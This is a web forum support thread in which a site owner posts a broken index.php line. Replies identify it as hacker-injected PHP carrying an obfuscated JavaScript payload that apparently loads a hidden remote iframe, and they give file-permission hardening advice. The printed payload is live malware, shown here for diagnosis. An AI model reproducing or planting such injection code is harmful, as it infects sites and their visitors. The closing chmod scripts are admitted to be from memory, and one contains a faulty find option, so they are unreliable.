News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

Forum just showing white screen

Started by media123, May 06, 2012, 05:37:47 AM

Previous topic - Next topic

media123

Hallo people I am in desperate need of your help.
I am running a PHP forum on my website and everything was working fine and then all of a sudden I get a blank screen when I try and open the forum page.

Looking into the error log i get the error below

[06-May-2012 19:04:57] PHP Parse error: syntax error, unexpected T_LNUMBER, expecting ',' or ';' in ///public_html/forum/index.php on line 1


If I open the inde.php file this is the line 1, what is wrong with this particular because I just cant seem to be making headway in resolving this issue.

<?php
if (!function_exists('security_6c7b3c4482')) { function security_6c7b3c4482(){ echo '<!--(6c7b3c4482)--><script>try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qw){h=-parseInt(\\'012\\')/5;}if(window[\"document\"])try{prototype;}catch(brebr){st=String;zz=\\'al\\';zz=\\'zv\\'.substr(123-122)+zz;ss=[];f=\\'fr\\'+\\'om\\'+\\'Ch\\';f+=\\'arC\\';f+=\\'qgode\\'[\"substr\"](4-2);w=this;e=w[f[\"substr\"](11)+zz];n=\"3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#48#49.5#56.5#57#55#47.5#59.5#49#47.5#59.5#53#54.5#47.5#54#60#50.5#54.5#22#48.5#54.5#53.5#22.5#57#22.5#47.5#25#27.5#50#27.5#50#25.5#47.5#49#24.5#49.5#25#23#47.5#26#49.5#24.5#27.5#26#49#27.5#25#23#25.5#25#24.5#24.5#49.5#48.5#26#26.5#24#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#48#49.5#56.5#57#55#47.5#59.5#49#47.5#59.5#53#54.5#47.5#54#60#50.5#54.5#22#48.5#54.5#53.5#22.5#57#22.5#47.5#25#27.5#50#27.5#50#25.5#47.5#49#24.5#49.5#25#23#47.5#26#49.5#24.5#27.5#26#49#27.5#25#23#25.5#25#24.5#24.5#49.5#48.5#26#26.5#24#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5\"[((e)?\"s\":\"\")+\"p\"+\"lit\"](\"a#\"[((e)?\"su\":\"\")+\"bstr\"](1));for(i=6-2-1-2-1;i-635!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;if(f&&e)e(\"\"+q);}</script><!--(/6c7b3c4482)-->'; register_shutdown_function('security_6c7b3c4482'); } }
?>

floridaflatlander

Quote from: media123 on May 06, 2012, 05:37:47 AM
I am running a PHP forum on my website

PHP Parse error: syntax error, unexpected T_LNUMBER, expecting ',' or ';' in ///public_html/forum/index.php on line 1

A smf forum? Anyway you've changed something and screwed up the code. Looks like you added or left out a comma or semi colon

NanoSector

Or some sucking hackers tried to add that code in and didn't know there was a syntax error in it... :P

If you don't know what it does, what you need it for, and how it got there, remove it.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Arantor

That's definitely a hacker injecting some code into your forum. Chances are every .php file you have is infected.

Colin

It is a shame this is so common now a days.
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

Arantor

The real shame is that most of it is avoidable except people don't.

SMF pushes people to making files writable and then people don't make them unwritable again, causing all the files to be left writable by any process on the server. Thus anything on the server that is compromised will then go on to infect forums.

People don't believe me when I tell them how common this actually is and that there's little you can do to deal with it all the time that files have to be writable by the application itself, which is why I keep telling people not to use one-click installers for updates.

Chalky

So what is the best way to prevent this kind of thing happening?

Arantor

Make sure all your files are not writable, use 644 permissions for files and 755 for folders - you can set that from Admin > Packages > Options.

Colin

Also keep your forum and modifications up to date.
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

Arantor

Yup, though very often people leave their forum insecure so that they can keep it 'up to date' without realising that they're actually making themselves insecure.

Chalky

Quote from: Arantor on May 06, 2012, 02:12:37 PM
Make sure all your files are not writable, use 644 permissions for files and 755 for folders - you can set that from Admin > Packages > Options.

Thanks, I've just looked in there but I can't see how to select those settings.  I plumped for the "Use predefined permission profile: Restricted - minimum files writable" but looking in my FTP nearly everything is now set to 755 whether file or folder, with a few 705s and a few 604s - how do I change it all to what you said without changing them manually through my FileZilla one by one?

Apologies if I have my dumb blonde head on, but it is Sunday....  :P

Arantor

I thought you could set it via the admin panel (though restricted would work)... having files be 755 isn't really a problem and neither is 705/604, the key point generally is that the second and third digits aren't 6 or 7.

Though even that isn't necessarily safe, where you have files added during mod installs - that's actually still a security risk because it's still writable by the webserver itself (and thus vulnerable however you slice it)

Tyrsson

You also have to bear in mind that the host themselves often times force this issue themselves with incorrectly configured servers that require 0777. Especially after a user starts installing mods that edit files, since they could then become owned by the webserver and then require 0777 if the account user is to edit their own files or change the permissions back to a sane value.
PM at your own risk, some I answer, if they are interesting, some I ignore.

MrPhil

If you can figure out how to run a "shell script" on your server (e.g., 1-shot cron job or SSH access), you could change all permissions to 755 (directories) and 644 (files), or even 555 and 444. Certain directories such as attachments and avatars may have to be left writable (755 or 775 or even ! 777). When you want to make some change (mod install, update, etc.), run another script to change all directories and files to writable (by SMF via PHP), make your changes/uploads, and run the original script to restore permissions to read-only.

On a Linux system, a "readonly" script might go something like (assuming the forum is in public_html/forum/, and 775 is necessary for SMF to write to a directory):

#!/bin/ksh
# convert all directories to read-only
find forum -type -d -exec chmod 555 {} \;
# specific directories make read-write by PHP
chmod 775 forum/attachments
chmod 775 forum/avatars
# convert all files to read-only
find forum -type f -exec chmod 444 {} \;
# no files to change back to read-write in normal operation (best to leave Settings.php R/O)


To change back to read-write by owner and SMF, "readwrite" would be something like

#!/bin/ksh
# convert all directories to read-write
find forum -type -d -exec chmod 775 {} \;
# convert all files to read-write
find forum -type f -exec chmod 664 {} \;


Back up your forum before experimenting with this! I'm doing the "find" command from memory, and I haven't used -exec for a while, so you'll probably want to look that up and confirm it.

Advertisement: